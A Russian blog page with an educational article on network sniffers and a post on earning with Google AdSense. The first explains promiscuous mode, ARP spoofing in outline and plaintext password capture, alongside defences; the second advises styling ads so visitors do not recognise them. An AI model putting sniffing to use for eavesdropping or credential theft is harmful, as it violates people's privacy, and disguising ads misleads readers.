понедельник, марта 31, 2008

IT-Безопасность: Что такое Сниффер (Sniffer)

Сниффер – это программа, которая позволяет перехватывать сетевой трафик. Когда говорят о снифферах, то обычно проводят аналогию с прослушиванием телефонных разговоров. Подключившись к телефонной сети, можно перехватить беседу людей. Примерно также в компьютерных сетях можно перехватывать информацию, которой обмениваются компьютеры. Прослушивание возможно благодаря особенности архитектуры сети Ethernet (IEEE 802.3). Архитектура большинства локальных сетей основана на технологии Ethernet (ether – эфир, network – сеть), в которой все устройства подключены к одной среде передачи данных и совместно её используют. Топология сети Ethernet – линейная или звездообразная, а скорость передачи данных 10, 100 и 1000 Мбит/сек. Ethernet – это широковещательная сеть, в которой все узлы могут принимать все сообщения через единую магистраль. Используя эту особенность Ethernet, отпадает необходимость несанкционированного подключения к сегменту сети, т.е. не требуется резать кабели. Компьютер, с которого предполагается прослушивать, уже подключен к некоторому сегменту сети.ПРИМЕЧАНИЕ

Sniff (англ.) – нюхать, фыркать, втягивать носом.

Слово sniffer предприимчивые американцы из фирмы Network Associates зарегистрировали. Оно является торговой маркой, под которой распространяется программа-анализатор работы компьютерной сети.

Сниффер может анализировать только то, что проходит через его сетевую карту. Внутри одного сегмента сети Ethernet все пакеты рассылаются всем машинам, из-за этого возможно перехватывать чужую информацию. Использование коммутаторов (switch, switch-hub) и их грамотная конфигурация уже является защитой от прослушивания. Между сегментами информация передаётся через коммутаторы. Коммутация пакетов – форма передачи, при которой данные, разбитые на отдельные пакеты, могут пересылаться из исходного пункта в пункт назначения разными маршрутами. Так что если кто-то в другом сегменте посылает внутри его какие-либо пакеты, то в ваш сегмент коммутатор эти данные не отправит.

Прослушивающие программы или пакетные анализаторы скачать которые можно на сайте, относятся к классу утилит двойного назначения. С одной стороны снифферы – мощное оружие, с помощью которого можно осуществить пассивную сетевую атаку. Эти программы могут представлять собой серьезную угрозу, поскольку могут перехватывать и расшифровывать имена и пароли пользователей, конфиденциальную информацию, нарушать работу отдельных компьютеров и сети в целом. Известно, что в большинстве протоколов передачи данных (FTP, POP, HTTP, telnet) секретная информация между клиентом и сервером передаётся открытым текстом. Поэтому злоумышленнику не составляет большого труда получить доступ к чужой информации. Достаточно раздобыть программу-сниффер, настроить её фильтры и ждать, когда жертва будет подключаться к серверу. С другой стороны снифферы помогают системным администраторам осуществлять диагностику сети и отслеживать атаки компьютерных хулиганов. Кроме того, они служат для проверки и детального анализа правильности конфигурации сетевого программного обеспечения. Иными словами – щит и меч.

Если посмотреть на сниффер с точки зрения программиста, то окажется, что это мощное средство для отладки и диагностики программ. В первую очередь это касается сетевого программного обеспечения, распределённых информационных систем и приложений типа клиент-сервер. Эта статья адресована программистам и начинающим хэкерам – исследователям мира сетевых технологий. Для компьютерных хулиганов будет намного проще выкачать с какого-нибудь сервера уже готовый программный продукт.

Информация передаётся по сети, и получает её каждое устройство этой сети. По умолчанию сетевая плата компьютера видит только то, что предназначено именно для неё. Однако прослушивающие программы устанавливают её в режим приёма всех пакетов – promiscuous mode(Promiscuous,англ. – неразборчивый, смешанный), прослушивают сеть и заставляют сетевую плату принимать все кадры, вне зависимости от того, кому они адресованы в сети.

В основе многих снифферов были и есть сетевые драйверы и библиотеки (libpcap, libnet), которые осуществляют большую часть работы. Дело в том, что для переключения сетевой платы в promiscuous mode требуется низкоуровневое программирование её портов. В многозадачной ОС такую работу могут выполнить только драйверы уровня ядра системы (kernel-mode drivers). Первые программы такого типа были созданы для операционных систем Unix. Для установки вручную сетевого интерфейса в "неразборчивый" режим необходимо включить флаг PROMISC:$ifconfig eth0 promisc; для отключения promiscuous mode:$ifconfig eth0 –promisc.

Вскоре снифферы перебрались в популярную ОС Windows, но их работа в этой системе также требовала сетевого драйвера, который переключал сетевую плату (NIC – network interface card) в специальный режим. До недавнего времени создание программ-снифферов было уделом квалифицированных специалистов. С появлением Windows2000 создать программу для прослушивания сегмента сети стало совсем просто.

Однако прежде чем приступить к созданию прослушивающей программы необходимо понять основы передачи данных в сети, ведь работа сниффера как раз связана с особенностью функционирования сети Ethernet. Машины в отличие от людей общаются между собой в соответствии с определёнными правилами – протоколами.

Основы передачи данных в сети Ethernet.



Каждому устройству в сети Ethernet соответствует уникальный шестибайтовый MAC-адрес (Media Access Control). Единицей передачи данных в такой сети является кадр (frame), который имеет определённую структуру и несёт в себе информацию о получателе, отправителе и сами данные.
struct ETHERNET_FRAME
{
unsigned char dest[6];// MAC-адрес получателя
unsigned char src[6]; // MAC-адрес отправителя
unsigned short type; // версия: IPv4 0x0800, IPv6 0x86DD, ARP 0x0806
unsigned char data[]; // данные
};

Кадр может иметь размер от 60 до 1514 байт, из которых первые 14 байт являются служебными. Когда требуется передать большее количество данных, они разбиваются на фрагменты и последовательно направляются в сеть. Кадр передаётся по сети, и получает его каждое устройство этой сети. Значение поля структуры с именем type определяет тип и версию "полезного груза" в кадре. Завершающая секция кадра служит для проверки целостности передаваемых данных и использует код циклического контроля (CRC32 – cyclic redundancy check). Значение этого кода вычисляется с помощью специальной хэш-функции для выявления искажённости числовых данных. Обычно она аппаратно реализована в сетевой плате.

Теперь обратим внимание на полезный груз, который несёт кадр, а именно поле структуры data[]. Чаще всего в качестве данных может быть IP-пакет или ARP-пакет. ARP (address resolution protocol) – это служебный вспомогательный протокол, который осуществляет динамическую трансляцию физических MAC-адресов в логические IP-адреса на основе широковещательной рассылки запросов. struct ETHERNET_ARP
{
unsigned short hrd; // Тип аппаратуры (Ethernet), 0x0001.
unsigned short pro; // Протокол (IP), 0x0800.
unsigned char hln; // Длина аппаратного адреса (MAC), 6 байт.
unsigned char pln; // Длина адреса протокола IP, 4 байта.
unsigned short op; // Вид операции {Запрос, Ответ} = {1, 2}.
unsigned char sha[6];// Аппаратный адрес (MAC) отправителя.
unsigned char spa[4];// IP-адрес отправителя.
unsigned char tha[6];// Аппаратный адрес (MAC) получателя.
unsigned char tpa[4];// IP-адрес получателя.
};


Для доставки пакетов в сети нужно определить физический адрес узла назначения. Именно для этого существует ARP – протокол автоматического определения физических адресов (IP <=> MAC). Когда одному компьютеру нужно начать обмен данными с другим, он ищет MAC-адрес получателя соответствующий запрашиваемому IP-адресу в своей ARP-таблице. Если для нужного IP-адреса не найден соответствующий MAC-адрес, то посылается широковещательный запрос ARP, содержащий искомый IP-адрес назначения, а MAC-адрес для широковещательной рассылки заполнен единицами FF:FF:FF:FF:FF:FF. Целевой хост узнает свой IP-адрес, обрабатывает запрос и посылает ответ. Система готова к пересылке данных по локальной сети.

Для нас особый интерес представляют IP-пакеты, предназначенные для передачи информации. Это более высокий уровень сетевой OSI-модели данных. Сейчас повсеместно распространена четвертая версия IP. Однако постепенно начинает делать первые шаги шестая версия этого протокола передачи данных. Новая версия интернет-протокола значительно расширит диапазон адресов, упростит автоматическое конфигурирование IP-сетей. Немаловажно, что следующая версия IP располагает исключительными средствами обеспечения безопасности и шифрации трафика.struct IP6Header
{
unsigned long ver:4; // Версия IP-протокола
unsigned long tclass:8;// Класс трафика
unsigned long label:20;// Метка потока
unsigned short length; // Длина пакета
unsigned char next; // Next header (опции)
unsigned char hop; // Hop-limit.
unsigned char src[16]; // 128-битный адрес отправителя
unsigned char dst[16]; // 128-битный адрес получателя
};

Далее в статье будут рассматриваться только IP-пакеты самой распространённой четвёртой версии. Пакет состоит из заголовка, служебной информации (options) и данных. На языке С этот заголовок выглядит в виде вот такой структуры:typedef struct _IPHeader
{
unsigned char verlen; // версия и длина заголовка
unsigned char tos; // тип сервиса
unsigned short length; // длина всего пакета
unsigned short id; // Id
unsigned short offset; // флаги и смещения
unsigned char ttl; // время жизни
unsigned char protocol; // протокол
unsigned short xsum; // контрольная сумма
unsigned long src; // IP-адрес отправителя
unsigned long dest; // IP-адрес назначения
}IPHeader;

Подробно IP протокол описан в RFC за номером 791. Для нас особый интерес представляют поля заголовка protocol, src и dest. Два последних поля – это IP-адреса отправителя и получателя пакета. Например, шестнадцатеричное значение адреса 0x0000140A соответствует 10.20.0.0.

Поскольку в сети постоянно циркулирует огромное количество пакетов, то их лучше отфильтровывать. Критериями фильтрации могут быть IP-адреса, тип вышестоящего протокола (TCP, UDP, ICMP, PUP), а также содержимое пакета. Функции фильтрации весьма полезны, так как не только ограничивают собираемую программой информацию действительно нужной, но и просто обеспечивают её нормальную работу. Вполне возможно, что при интенсивной загрузке локальной сети компьютер и программа-сниффер будут не способны обработать всю поступающую информацию.

Посчитаем, сколько потребуется времени для заполнения жёсткого диска объёмом 80 Гбайт при перехвате всего трафика с сети 100 Мбит/сек. В секунду будет передано примерно 10 Мбайт. 80 Гбайт / 10 Мбайт/сек = 2,5 часа. Немного…

Отсутствие критериев для фильтрации или задание слишком большого числа вариантов для IP приводит к тому, что программа-перехватчик не успевает обрабатывать все пакеты. А если ещё записывать все пакеты на жёсткий диск, то последний может переполниться в считанные минуты. На этом факте основаны некоторые программы для борьбы с прослушиванием. Они посылают в сеть множество пакетов с поддельной информацией о паролях и т.д. В результате снифферы "захлёбываются" в огромном потоке дезинформации.

Драйвер сетевой платы (NIC) занимается приёмом и передачей кадров в сеть Ethernet. Максимальный размер IP-пакета, включая служебные данные, составляет 64 килобайта, а максимальный размер данных в кадре, как вы уже знаете, 1500 байт. При необходимости драйвер осуществляет фрагментацию и сборку IP-пакетов. Сетевая подсистема в ОС Windows основана на многоуровневой архитектуре, которую в 1978 году одобрила международная организация стандартов. Таким образом, NIC-драйвер взаимодействует с драйверами вышестоящих протоколов.

Программа для прослушивания сегмента сети работает именно с IP-пакетами. Она использует библиотеку Windows Sockets версии 2.2 и функционирует под управлением Windows 2000 и более поздних систем. Программирование "сырых" сокетов (raw sockets) в системе Windows предыдущих версий было почти невозможно. Неудивительно, что долгое время программы такого типа создавались только под системы Unix и DOS.

Современная архитектура сетевого программного обеспечения основана на семиуровневой модели OSI (Open Systems Interconnection). В основе модели лежит принцип абстракции, когда каждый компонент выполняет свои функции и предоставляет некоторый сервис вышестоящему уровню.

Виды снифферов и сниффинга



Все, что будет описано в этом абзаце, естественно, носит некоторый оттенок условности, поскольку официальную "Теорию сниффинга" еще никто в полном объеме не описал. Придется придумывать классификацию "на ходу";)

Итак, по "месторасположению" (если тут применим этот термин) сниффер может работать:

• на маршрутизаторе (шлюзе)
При таком раскладе вы можете перехватывать трафик, проходящий через интерфейсы этого шлюза. Например из вашей локальной сети в другую сеть и в обратную сторону. Соответственно, если установить сниффер на маршрутизаторе провайдера Интернет, мы можем отслеживать трафик его пользователей, ну и так далее...

• на оконечном узле сети
Применительно к Ethernet мы будем иметь два основных возможных варианта прослушки. Классический, некоммутируемый Ethernet предполагает, что каждый сетевой интерфейс в принципе "слышит" весть траффик своего сегмента. Однако в нормальном режиме работы сетевой карты, прочитав первые 48 бит заголовка фрейма, станция сравнивает свой МАС-адрес с адресом получателя, указанном в фрейме. Если адрес чужой, станция "стыдливо закрывает уши", то бишь перестает читать чужой фрейм. Таким образом в нормальном режиме вы можете перехватывать и анализировать только свой траффик. Для перехвата пакетов всех станций сегмента требуется перевести вашу сетевую карту в режим под названием promiscuous mode, чтобы она "бесстыдно" продолжала читать не предназначенные ей пакеты. Практически все реализации снифферов позволяют переход карты в promiscuous mode.

Примечание: использование коммутируемого Ethernet создает ситуацию, когда даже переход карты в promiscuous mode делает прослушивание не предназначенного вашей станции трафика практически невозможным. Однако существует технология организации такого прослушивания путем так называемого ARP-спуфинга. Суть в следующем: коммутатор создает так называемый "broadcast domain", и хост с установленным сниффером с помощью подделки ARP-сообщений может притвориться, например, пограничным маршрутизатором (рассылая постоянно АRP-сообщения, где сетевому адресу маршрутизатора соответствует MAC-адрес прослушивающей станции). Таким образом трафик соседей насильственно завернется в сторону "шпиена".

В остальном же снифферы могут отличаются друг от друга главным образом функциональными возможностями, как то:

• поддерживаемые физические интерфейсы и протоколы канального уровня;
• качество декодирования и количество "узнаваемых" протоколов;
• пользовательский интерфейс и удобство отображения;
• дополнительные фичи: статистика, просмотр в реальном времени, генерирование или модификация пакетов и другое...

При выборе сниффера (как, впрочем, и любого другого софта) есть смысл руководствоваться следующими соображениями: из того, что существует под вашу ОС выбираем либо то, что точно соответсвует вашим задачам (имеет смысл в том случае, если вы планируете либо разовое мероприятие, либо постоянное выполнение одной и той же операции) либо максимально навороченное решение, в случае, если вы чувствуете, что сниффер будет вам полезен, но еще не знаете в какой ситуации:) А ситуации бывают разные...

зачем нам нужен сниффер?



Традиционно идея сниффинга жила как бы в двух ипостасях: легальное и нелегальное применение. Что характерно, слово "сниффер" чаще применяется в нелегальной сфере, а "сетевой анализатор" - в легальной. Начнем, пожалуй, с легального применения;)

- troubleshooting (обнаружение проблем и узких мест сети). В расширенном режиме, когда сниффер работает в некоммутируемом сегменте или на шлюзе, мы можем получить практически полную картину событий, происходящих в нашей сети: интенсивность трафика по времени, по рабочим станциям, по протоколам, количество ошибок разных типов. Кроме того, в обоих режимах, мы можем "разгребать" более специфические проблемы, когда, скажем, у конкретной станции ни в какую не получается организовать некое взаимодействие по сети, и это при том, что внешне сеть выглядит вполне работоспособной. Особенно полезен сниффер в случаях, когда сетевое ПО плохо документировано или использует свои закрытые (недокументированные), зачастую подозрительные технологии (протоколы).

Например: ICQ, Europe Online. Под подозрительными технологиями/ПО следует понимать ситуации, когда вы предполагаете наличие в программе закладки или иной недокументированной функциональности. Например, ходили слухи, что клиентская часть знаменитого cDc Back Orifice также является троянской лошадкой и посылает некие сведения хозяевам - авторам ПО. Установка BO Client "на прослушивание" показала, что слухи не соответствуют действительности.

Не менее полезен сниффер для отладки вашего собственного ПО. Никогда не забуду момент, когда прокси-сервер не желал устанавливать соединение, если GET-запрос оканчивался на \n\n вместо требуемого \r\n\r\n. Только исследование пакетов, отправляемых "законопослушным" браузером и сравнение их с пакетами, отправляемыми моим "выскочкой"-скриптом, указало мне на досадную ошибку. Очень и очень часто в повседневной админской практике мне приходится сталкиваться и с анализом на уровне TCP/UDP.

- обучение. Можно довестись до полуобморочного состояния, зазубривая форматы заголовков пакетов различных протоколов и методы взаимодействия (скажем, 3-way TCP handshake, DNS, прикладные методы плана traceroute), но эти знания будут мертвыми, пока вы не попытаетесь "потрогать это руками" - написав однажды программу либо... заглянув в сниффер! Попробуйте после прочтения документации на неизвестный или плохо понятный вам протокол, смоделировать взаимодействие, перехватить пакеты и проанализировать их - уверяю вас, все станет чрезвычайно понятно и более того, это знание более реально и надолго отложится в голове. В случае же с закрытыми технологиями, сниффер может оказаться чуть ли не единственным средством для их изучения.

- протоколирование сетевого трафика. Можно много дискутировать на тему правомерности и этичности протоколирования администратором трафика пользователей для дальнейшего просмотра, но факт остается фактом - многие организации включают в политику безопасности эту технологию. Мое личное мнение - хозяин барин, то бишь если компания обеспечивает своих сотрудников оборудованием, подключением к локальным и глобальным сетям, она вправе требовать надлежащего использования этих ресурсов. Вторая важная причина для протоколирования трафика - обнаружение попыток несанкционированного доступа и других зловредностей - DoS-атак например. Имея такие логи администратор с 100-процентной точностью может знать, что происходит в его сетевых владениях.

Теперь поговорим о нелегальной стороне сниффинга. Ну, во-первых, это банальное

- подслушивание. Грамотно установив сниффер вы можете шпионить за ближними своими и удаленными - врагами, приятелями, супругами;) Вас могут заинтересовать такие вопросы: для чего человек использует сеть, какие веб-ресурсы он посещает, какие данные передает, с кем и о чем общается? Да простят меня органы государственной безопасности, но пресловутый СОРМ, правомерность которого в виде тотального протоколирования трафика суть баааальшой вопрос, я отношу пока именно в этот раздел, хотя он мог бы оказаться и в последнем абзаце "легального сниффинга";)

- более меркантильное подслушивание. Однако значительная часть "хакерского" сообщества не разменивает свои таланты на слежку за неверными супругами и прочую бытовуху. Чаще всего злоумышленника интересует некий материал, с помощью которого можно продвинуться в нелегком деле вламывания в чужие системы и сети. Как вы могли догадаться, речь идет, главным образом, о перехвате имен пользователей и паролей, проходящих по сети в незашифрованном (plain text) виде. В частности, это касается паролей к telnet, POP, IMAP, NNTP, IRC, к веб-приложениям, не использующим шифрование, SNMP v1 community-strings и т.п.

Методы защиты от прослушивания сети.



Многих волнует проблема безопасности передачи данных в сети. Проблема может быть решена различными способами. Первый и самый дорогостоящий – аппаратный метод, когда вместо дешёвых концентраторов (hub) устанавливаются коммутаторы (switch). Второй и более надёжный – шифрование сетевого трафика. Информацию можно будет перехватить сниффером, но прочитать её будет невозможно. Шифровать можно с помощью технологии SSL (secure sockets layer), которая встроена почти во все браузеры. Она почти всегда используется в электронной коммерции и вполне надёжна. При работе с электронной почтой сообщения следует шифровать средствами PGP (pretty good privacy) или Secure MIME. В локальных сетях можно включить шифрацию IP-трафика. В Windows 2000 эту работу выполняет встроенный протокол IP Secure. Следуя этим простым советам можно гарантировать конфиденциальность передаваемой информации.


Windows-реализации снифферов



CommView
www.tamos.com
Этот сниффер сам использую для административных задач.
Довольно продвинутый сниффер производства TamoSoft, скачать можно на сайте. Можно установить свои правила на сниффинг (например, игнорировать ICMP, а TCP сниффать, также кроме интернет-протоколов имеется поддержка ethernet-протоколов, таких как ARP, SNMP, NOVELL и т.д.). Можно, например, сниффать только входящие пакеты, а остальные игнорировать, можно указать лог-файл для всех пакетов с лимитов размера в мегабайтах. Имеет две утилиты - Packet Generator и NIC Vendor Indentifier. Можно посмотреть все подробности посланных/полученных пакетов (например, в TCP-пакете можно просмотреть Source Port, Destination Port, Data length, Checksum, Sequence, Window, Ack, Flags, Urgent). Радует еще то, что она автоматически устанавливает capture-драйвер. В общем утилита очень полезная для снифа, рекомендую всем.


IRIS
www.eeye.com
IRIS продукт известной фирмы eEye скачать можно на сайте. Представляет обширные возможности по фильтрации. Меня в нем сильно порадовало три фишки:
1.Protocol Distribution
2.Top hosts
3.Size Distribution
Также имеется Packet Decoder, скачать который можно на сайте. Он поддерживает развитую систему логов. А доступные возможности фильтрации превосходят все снифферы обзора. Это Hardware Filter, который может ловить либо все пакеты (Promiscious), либо с различными ограничениями (например, захватывать только multicast пакеты или broadcast пакеты, либо только Mac-фреймы). Можно фильтровать по определенным MAC/IP адресам, по портам, по пакетам, содержащим определенные символы. В общем, неплохой сниффер. Требует 50comupd.dll.

BlackICE Pro
http://www.networkice.com/
На самом деле BlackICE является системой обнаружения вторжений (IDS, Intrusion Detection System), но одна из функций ее - писать сырые дампы пакетов в форме, приемлемой для расшифровки анализаторами протоколов. Одно но: программа просматривает только трафик, проходящий через локальные интерфейсы хоста, на котором работает, то бишь является non-promiscuous. Скачать прогу можно на сайте

Analyzer
http://netgroup-serv.polito.it/analyzer/
Бесплатный анализатор протоколов.

суббота, марта 29, 2008

Заработок с Google AdSense

Кто ещё не участвует в программе заработка на контекстной рекламе Google AdSense, присоединяйтесь!

Если у твоего сайта уже есть в день по 30-50 посетителей и много интересной тематической информации, то надо начинать работать с Google AdSense.

Зарегистрировавшись и подтвердив свой адрес электронной почты, ты сможешь заходить в аккаунт (личный кабинет), делать все нужные настройки и смотреть статистику. Регистрация, настройка, просмотр и анализ статистики - предельно просты, так как выдаются на твоём родном языке, а также имеются готовые ответы на самые сложные вопросы.

Получи коды баннеров и поставь их на свой сайт. Также поставь форму поиска. Внимательно отнесись к оптимизации сайта для получения максимальной прибыли (для этого есть специальный раздел в Справочном Центре Гугл).

Также, нужно подтвердить свою налоговую информацию: указать, что ты не являешься гражданином США, не имеешь там бизнес и доход по программе не извлекается на территории США.

Правильно укажи свой почтовый адрес (на английском языке). Когда ты наберёшь $50 на счёте, на твой адрес придёт письмо (по обычной почте) с кодом протекции. Этот код нужно будет ввести в своём аккаунте. Тогда после набора $100 ты сможешь выводить деньги.

В Россию, Украину, Беларусь и ряд подобных стран, деньги высылают только именными банковскими чеками.

Допустим, в мае ты набрал 100 баксов. Тогда 23-25 июня тебе вышлют чек на сумму заработка. Я заказываю чек доставкой обычной почтой (это дешевле). Мне в Россию чеки приходят их Швеции (Европейское отделение американского CityBank). Письмо идёт не более 20 дней.

На инкассо (обналичивание) чеки принимают разные банки. Я пользуюсь услугами Внешторгбанка (ВТБ24). Сдача чека обходится примерно в 390 рублей (2% от суммы чека, но не менее $15). Чеки менее $750 сдавать на инкассо не выгодно - теряешь на оплате комиссионных банку. Ведь, что ты сдашь чек на $100, что на $750, с тебя всё равно возьмут комиссию $15. Наличку выплачивают в обменном пункте того же отделения банка, где ты сдал чек на инкассо. Весь процесс занимает 1,5 месяца (чек для подтверждения отправляют в CityBank обычной почтой, а тот посылает подтверждение тоже обычной почтой).

В первый же день начала работы с контекстной рекламой Гугла, ставь задержку платежа. Это нужно, чтобы тебе не выслали чек сразу как только ты заработаешь свои первые $100 в системе. Дело в том, что когда ты захочешь обналичить (окешить) чек, то банк в твоей стране возьмёт с тебя большую комиссию за принятие чека на инкассо и отправку его на подтверждение в CityBank. Ещё возьмут комиссию при выдаче наличных. Зачем часто терпеть такие убытки и тратить время (обналичка занимает 1-2 месяца), если можно один раз в год получить чек на большую сумму, обналичить его, а на вырученные деньги съездить в отпуск за границу? Выгоднее сдать чек на $1000 - $2000, чем на $100. Меньше денег теряется на комиссионных банку.

Я прочитал в справочном центре, что чек выдаётся на срок 1 год. Потом он автоматически аннулируется, но деньги не теряются, а возвращаются на твой аккаунт в ЭдСенс. Учитывая, что чек идёт до тебя до 1 месяца, сам понимаешь, что медлить с обналичиванием не нужно. Получил чек - сразу в банк! В банк нужно бежать сразу ещё и потому, что сумма чека указана в долларах США, а доллар ежедневно дешевеет.

Как правило, в банке сразу к тебе относятся уважительно. Показывают, что и как нужно заполнить. Разъясняют порядок приёма чека и выплаты по нему денег. Ты сразу становишься VIP-клиентом! А когда ты приносишь в этот же банк второй и последующие чеки, тебя носят на руках, целуют, угощают кофе и шоколадом.

Почему я рекомендую работать именно с контекстной рекламой Гугла? Ведь есть ещё Яндекс.Директ и Бегун? У них нет необходимости так заморачиваться с банковскими чеками, а заработок можно спокойно получить в Яндекс.Деньги или в WebMoney.

Мы с партнёрами рассчитали, что доход от прочих систем контекстной рекламы минимум в 8 раз меньше, чем от Гугла. Поэтому, я считаю, что лучше работать с Гуглом. Про Яндекс.Директ и Бегун я ещё напишу в других разделах.

Ещё большой плюс Гугла, что он принимает (или не принимает) твой сайт с любыми параметрами, в то время, как Яндекс требует хорошей посещаемости (от 300 человек в сутки). Бегун также предъявляет требования к посещаемости (от двух человек для сайтов на платном хостинге, и от 300 - на бесплатном). Бегун с Яндексом предъявляют и другие требования к сайтам. Гугл может и отклонить твой сайт, но учитывая, что ты заранее стараешься сделать хороший авторский сайт - не отклонит. Просто приложи все силы, чтобы сделать интересный и нужный людям сайт. Гугл это оценит!

Кстати, есть способ бесплатно открыть свой сайт не зная ничего про HTML, PHP, домены и хостинг. И с этим сайтом тебя гарантированно примут в Google AdSense! О чём речь? Гугл купил популярный сервис блогов Blogger.com Блог - это онлайн дневник. То есть сайт, где ты можешь писать свои мысли, а посетители сайта могут их читать и давать им свой комментарий. Отличие блогов от форумов именно в том, что на форуме все могут заводить темы и писать в них, а в блоге "темы" заводит его автор, а остальные могут лишь комментировать статьи автора. Так вот, зайдя на Blogger.com, ты можешь завести свой блог. Это делается очень просто: бесплатно, а описание регистрации разбито на шаги и описано на русском языке (поддерживается множество языков).

Заведи блог и сделай на нём несколько постов. Потом выжди неделю-две и смело регистрируйся в ЭдСенс. Гугл примет тебя с распростёртыми объятиями, ведь ему нужно раскручивать собственный сервис. Таким образом, ты бесплатно получаешь свой сайт и возможность участвовать и получать деньги от Google AdSense. Блоги любят все поисковики в мире. Поэтому тебе обеспечены хорошие позиции в поисковой выдаче и хороший трафик. Не забывай еженедельно писать новые статьи в блоге и отвечать на критические замечания посетителей твоего блога.

Если тебе потом захочется поставить рекламу Гугла на другой свой сайт, это сделать очень легко. Просто поставь код баннеров на новый сайт и всё! Не нужно нигде указывать, что это другой сайт. Гугл сам это поймёт и в течение нескольких дней найдёт тебе рекламодателей по тематике сайта. Однажды проверив твой уровень веб-мастера и приняв в число партнёров, Гугл будет автоматом принимать все остальные твои сайты.

Говоря о доходах от размещения на сайте рекламы через Google AdSense, следует иметь ввиду, что Гугл запрещает раскрывать размер доходов от участия в программе. За разглашение этой информации сразу блокируют аккаунт и прекращают партнёрство. Поэтому, осторожно делись такой информацией: никаких конкретных цифр, сумм и сроков!

Внимательно отнесись к оптимизации своего сайта для достижения лучших результатов в программе. В твоём аккаунте есть вся информация про это. Я пока не оптимизировал сайт, получал по разному: от "ничего" до пары-тройки баксов в день. Через сутки после оптимизации я стал получать ежедневно в 10 раз больше. Теперь нет дней, когда никто не кликает по рекламным ссылкам. А реклама стала намного более подходящей под тематику сайта. Гугл очень старается для нас!

В Интернете много прочитал про Гугл и нашёл статистику, что начинающий веб-мастер получает в программе в среднем $1-2 в день. Тот, кто понял как и что надо делать (то есть всё правильно оптимизировал) начинает получать около $10 в сутки. Есть в России и те, кто получает более $300 и даже $500 в сутки. Но написать ведь можно всё, что угодно? Надо самому всё попробовать и прочувствовать.

А вот за границей (в основном, в США), точно есть вебмастера, которые получают намного больше. Читал и про тех, кто получает десятки и сотни тысяч долларов США в месяц. Очень интересно...

Если ты живёшь в Беларуси или в отдалённых районах России, Украины, Казахстана и т.п., то можешь подумать: "Обналичка в Беларуси - это проблема...". Скажу сразу, нет - не проблема. Ты можешь приехать в крупный город России, Украины, Польши или другой страны поближе и обналичить. Только сначала придётся сдать чек на проверку, а через 1-2 месяца вернуться в этот же банк за наличными.

Короче, не обращаем внимание на трудности. Мы не ищем лёгких путей! Трудности и проблемы есть всегда и во всём. Надо просто работать, делать дело и искать выход из трудных ситуаций.

Теперь про оптимизацию сайта для получения максимального дохода от контекстной рекламы Гугла. Сразу скажу, что лучше иметь статичные страницы, а не динамические. У кого сайт на РНР - делайте соответствующие настройки сервера.

Итак, нужны страницы с тематическим содержимым. Реклама ведь будет показываться тематическая. Например, на странице со статьёй о том, как правильно выбрать и купить цифровой фотоаппарат, будут объявления по темам "Фото", "Цифровые фотокамеры", "Компьютеры и ноутбуки". То есть, эти объявления будут максимально отвечать теме страницы сайта, а значит заинтересуют большой процент читателей статьи. Дочитав статью, посетитель сайта обычно что делает? Или переходит на другую страницу сайта, или покинет твой сайт. В случае с контекстной рекламой, он имеет возможность не просто уйти с сайта, закрыв окно браузера, а перейти по ссылке в рекламном объявлении. То есть, участие в программе Гугла - это лучший выход для владельца сайта. Ты теряешь посетителя, но получаешь деньги.

Итак, у тебя уже есть сайт с посещаемостью 30-50 человек в сутки. Есть тематические разделы и интересные статьи в каждом разделе. Статьи, кстати, лучше писать самому. Регистрируешься в Гугл ЭдСенс и ставишь на сайт банеры. Баннеры надо поставить так, чтобы не портить внешний вид сайта. В аккаунте есть даже специальная таблица, показывающая, куда чаще смотрят люди на мониторе. В эти места и предлагают поставить баннеры. Я не во всём последовал их советам.

Баннеров можно ставить 3 штуки с рекламой, 1 с блоками ссылок и 2 с "рефералами" (то есть, с баннерами тех коммерческих продуктов Гугл, которые ты хочешь продавать). Из рефералов я поставил баннер "Сайт приносит прибыль с помощью Гугла".

Кликать в основном будут на баннеры с рекламой и на на блок ссылок. Поэтому на странице сайта поставь максимально возможное число баннеров. Я так и сделал - поставил везде по 3 рекламных баннера и 1 блок ссылок. Только на форуме пока стоят 2 баннера...

Максимальное число баннеров поставить - дело не сложное. Но важно ещё и так баннеры разместить, чтобы за один раз показывать максимально возможное число объявлений. Ведь чем их больше, тем больше выбора у посетителя сайта. И, как следствие, больше вероятность, что его что-то заинтересует и он кликнет. Например, баннер 468х60 содержит всего 2 ссылки, баннер 120х600 - 5, баннеры 160х600 и 728х90 - по 5 ссылок. Количество ссылок в блоке ссылки ты выбираешь сам (4 или 5). Я выбрал 5, чего и остальным советую. Имея возможный максимум объявлений - имеем больший доход.

Выбирая, какая информация будет показываться на баннерах, нужно отключить показ графики. В аккаунте идём по закладкам: Мой аккаунт/Настройки аккаунта, кликаем "Настройка типа объявлений" и указываем: "Только текстовые объявления во всех рекламных блоках". Что это даёт? Да просто, если будет показываться графический баннер, то это всего 1 объявление, а если баннер с ссылками, то вместо одной картинки будет несколько ссылок. У посетителя появляется выбор, а у тебя увеличиваются шансы, что посетитель кликнет по объявлению. Даже если это баннер 468х60 с двумя объявлениями, твои шансы возрастают в два раза!

Перейдя на закладку Настройка AdSense и выбирая код для баннеров, следует иметь ввиду, что для увеличения кликабельности нужно, чтобы фон баннера совпадал с фоном страницы, на которой будет размещён. И не нужно обводить баннер границей. Тогда баннер сольётся с контентом страницы и посетитель не будет воспринимать его как рекламу. Рекламу люди часто просто не замечают.

Настроив, создав и разместив на своём сайте баннер, будь готов, что некоторое время на нём будет реклама на английском языке или социальная реклама. Дня за 4 Гугл найдёт рекламодателя для твоей странички и на баннерах появятся интересные ссылки.

Робот Гугла "увидит", что код баннера размещён на неизвестной ему странице и зайдёт на неё, чтобы определить содержание. Поняв тему страницы, он её проиндексирует (только для целей рекламы, а не поиска!). С этого момента рекламодатели будут автоматом "поставляться" на твою страницу.

Но на странице есть не только тематическая информация. В нашем случае, статья. Есть ещё навигация, верхние и нижние границы (буду описывать на примере моего сайта). А в будущем добавятся и объявления Гугла, которые он тоже будет индексировать и считать содержимым твоей страницы...

Так статья про цифровые фотоаппараты будет "размыта" темами Недвижимость, Работа, Погоды и прочими, которые есть в навигации. Это ухудшит качество рекламы. Вместо нормально контекста будет "кривой". На странице про цифровые фотоаппараты появится реклама строительных фирм, кадровых агентств, метеоцентров и т.п. Что делать?

Есть выход. Гугл предлагает делать нацеливание его робота на основную тематику твоей страницы. Для этого тебе нужно в код страницы вставить описания:

<google_ad_section_start>
и
<google_ad_section_end>

Например, у меня есть верх страницы, низ и три колонки: навигация, основное содержание и реклама. Ясно, что основную смысловую нагрузку несёт только основное содержание страницы, то есть - её центральная часть, там где размещена сама статья про покупку фотоаппаратов.

